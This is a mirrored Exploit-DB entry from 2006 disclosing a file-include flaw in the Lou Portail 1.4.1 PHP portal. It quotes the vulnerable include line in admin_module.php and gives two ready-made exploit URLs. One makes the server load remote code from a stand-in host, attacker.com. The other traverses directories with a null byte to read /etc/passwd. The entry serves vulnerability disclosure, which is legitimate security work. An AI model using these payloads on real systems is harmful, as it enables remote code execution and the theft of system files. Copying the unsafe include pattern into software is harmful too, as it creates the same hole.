bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/2603.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

29 lines
No EOL
1.2 KiB
Text
Raw Blame History

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
# #
# [ Lou Portail 1.4.1 ] #
#
# Class: Remote|Local File Include Vulnerability #
# Patch: Unavailable #
# Published 2006/10/18 #
# Remote: Yes
# Local: No #
# Type: High #
# Site: http://louportail.free.fr/ #
# Author: MP
# Contact: mp01010@yahoo.com #
# #
#################################################################
Vuln Code (admin/admin_module.php):
<?...
include ("$g_admin_rep/admin_utils.$g_ext");
...?>
#Vuln 1.0 -> require register_globals = On
http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt
#Vuln 2.0 -> require magic_quotes_gpc = Off
http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
# milw0rm.com [2006-10-20]
Reference in a new issue View git blame Copy permalink